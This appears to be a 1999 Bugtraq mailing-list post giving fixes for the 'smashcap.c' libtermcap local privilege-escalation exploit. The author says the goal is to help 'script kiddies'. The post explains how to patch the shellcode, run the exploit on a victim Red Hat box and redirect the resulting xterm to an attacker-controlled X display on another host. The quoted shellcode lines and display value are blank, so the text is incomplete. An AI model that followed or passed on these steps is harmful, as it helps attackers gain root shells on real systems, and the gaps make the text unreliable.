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libtermcap exploit fix ... smashcap.c

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Date: Mon, 23 Aug 1999 01:18:16 +0300
From: Hudin Lucian <luci@WILD.TRANSART.RO>
Subject: libtermcap exploit fix ... smashcap.c

 Hi, since bugtraq it's a full-disclosure list, let's
help the script kiddies a bit and scare the sysadms a little bit more...
 To make the smashcap.c work , all you have to do is remove one
0xff character before /bin/sh in the shellcode
so the line would be :
instead of :

also, you'll have to be on console running x to exploit it, but
 if you have another box where you can start x then it's ok
myhost$ startx;xhost
victim$ ./smashcap
and modify the last line from the smashcap.c into
	execl("/usr/X11R6/bin/xterm","xterm", "-display",
"", 0);

 well, it works on most redhats (tested on 5.1 and 5.2)
on slakware it sigsegv's , you need to work a little bit, sorry I don't
have a slakware box to work on .

regards, lucysoft

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